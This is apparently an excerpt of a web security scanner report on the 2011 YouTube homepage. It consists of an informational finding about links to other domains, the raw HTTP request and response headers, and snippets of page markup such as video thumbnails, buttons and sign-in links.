<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="RC/XD in Real Life!!!" data-thumb="//i1.ytimg.com/vi/dPZnRZt0iFY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/27');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="The Sloppy Roethlisberger - Epic Meal Time" data-thumb="//i3.ytimg.com/vi/FCxFn3sAw68/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmp');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Rosie Huntington eats Falafel" data-thumb="//i4.ytimg.com/vi/Wo9cx05PsSc/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmf');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/cmU39pGh5B8/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/gwn8FzrbSyQ/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/5Bj5WckNV3s/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/MWWC4uB2Ry4/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/YwYijHKtVUY/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/R55e-uHQna0/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/9y2gPm9RuYo/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/HBUKRFXGuqo/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/Dfr4gPb_JT4/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/tE1GmqCw1Qc/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<h3><a href="http://youtube-global.blogspot.com/2010/10/1-billion-subscriptions-and-counting.html">Subscription Widget</a>
...[SNIP]...
<h3>
<a href="http://youtube-global.blogspot.com/">Enjoy videos about some of the greatest artworks in the world</a>
...[SNIP]...
<p class="alignR">
<a href="http://youtube-global.blogspot.com/">Read more in our Blog</a>
...[SNIP]...
<li><a href="http://code.google.com/apis/youtube/overview.html">Developers</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/static.py?p=homepage&amp;page=start.cs&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Help');">Help</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Safety');">Safety</a>
...[SNIP]...
</span>

<a href="http://www.google.com/tools/feedback/intl/en/error.html" onclick="return yt.www.feedback.start('en', {&quot;accept_language&quot;: &quot;en&quot;});" id="reportbug">Report a bug</a>
...[SNIP]...
<div id="quicklist-player-close"><img onclick="yt.www.navigation.expandPlayer();" class="master-sprite expand-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"><img onclick="yt.www.navigation.closePlayer();" class="master-sprite close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"></div>
...[SNIP]...
<div id="quicklist-notifications" style="display: none;" class="yt-alert yt-alert-success yt-alert-small yt-alert-naked yt-rounded">
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="icon master-sprite" alt="Alert icon">

<div class="yt-alert-content">
...[SNIP]...
pe="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked start start-edge yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Previous video" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-prev" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end yt-uix-button" onclick=";return false;" id="quicklist-next-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-next" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
ist-play-button" type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Play videos" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-play" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
</span> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div style="display:none;" class="yt-uix-button-menu">
...[SNIP]...
aster-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-autoplay-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-autoplay" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
master-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-shuffle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-shuffle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end end-edge yt-uix-button" onclick=";return false;" id="quicklist-toggle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-toggle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
<button class="yt-uix-button quicklist-tray-button yt-uix-slider-prev" onclick="return false;"><img class="yt-uix-slider-prev-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Previous"></button><button class="yt-uix-button quicklist-tray-button yt-uix-slider-next" onclick="return false;"><img class="yt-uix-slider-next-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Next"></button>
...[SNIP]...
<li class="empty quicklist-help-message">Your queue is empty. Add videos to your queue using this button: <img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="addto-button-help"><br> or <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;hl=en_US&amp;ltmpl=sso">sign in</a>
...[SNIP]...
<div id="quicklist-loading"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Loading..."><span id="quicklist-loading-message">
...[SNIP]...
<span class="yt-uix-button-menu-item " onclick="">
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;hl=en_US&amp;ltmpl=sso">Sign in</a>
...[SNIP]...

18.140. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:47:51 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 21:47:51 GMT
Set-Cookie: GEO=38c99e8b5fa2944ea3fb0e09ce9f4837cwsAAAAzVVOtwdbzTUsihw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nUXNCUHlydnptdzllNDgxRHNKaHNEVU5tSTh4bkFvYjIxWEVaZy1HOUlGU1pfYldyLTQzTHBB -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</title>

<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vflAcpcNK.css">


<style type="text/css">
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" href="http://www.youtube.com/opensearch?locale=en_US" title="YouTube Video Search">
<link rel="icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="shortcut icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="canonical" href="/">
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflvTi9ps.js"></script>
...[SNIP]...
<a href="/" title="YouTube home">
<img id="logo" class="master-sprite" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="YouTube home">
</a>
...[SNIP]...
</a>

<a class="start" href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">Create Account</a><a class="end" href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
</span>
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="master-sprite">
</a>
...[SNIP]...
<div id="ad_creative_1" class="ad-div mastad" style="z-index: 1;">
<iframe id="ad_creative_iframe_1" src="http://ad-g.doubleclick.net/adi/com.ythome/_default;sz=970x250,960x250;klg=en;kt=K;kga=-1;kgg=-1;kcr=us;dc_dedup=1;kmyd=ad_creative_1;tile=1;dcopt=ist;ord=72977505232274?" height="250" width="970" scrolling="no" frameborder="0" style="z-index: 1" id="homepagetop" onload="yt.www.home.ads.workaroundLoad()" onmouseover="yt.www.home.ads.workaroundIE(this)" onfocus="yt.www.home.ads.workaroundIE(this)"></iframe>
...[SNIP]...
</span>
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('REC')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="REC-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="REC-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
ointer; display:inline; float: right;" onclick="_hidediv('logged_out_rec_learn_more_box'); return false;" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/Rec_LearnMore_Close');"><img class="img-php-close-button master-sprite" style="background-position: -82px -712px;" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div style="color: black; padding-left: 5px; padding-right: 10px; margin-top: 10px;">
Remember, you will get better, more specific, and more consistent recommendations by <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">logging in</a> (or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">signing up</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('TOP')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="TOP-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="TOP-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Off The Pill - Weird People" data-thumb="//i4.ytimg.com/vi/K1aLtgEjzPk/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/24');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Hulk Hogan VS Kim Jong-il - Epic Rap Battles of History 5" data-thumb="//i4.ytimg.com/vi/7rE0-ek6MZA/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/10');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Zach Wahls Speaks About Family" data-thumb="//i3.ytimg.com/vi/FSQQK2Vuf9Q/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/25');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="3D Maestro" data-thumb="//i2.ytimg.com/vi/uMTvaNomlWY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/1');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Chelsea FC - Blues News Headlines" data-thumb="//i1.ytimg.com/vi/ti6fxTTVoPs/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/17');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="How to watch 3D videos on YouTube" data-thumb="//i1.ytimg.com/vi/pNuKAaC337U/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/26');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
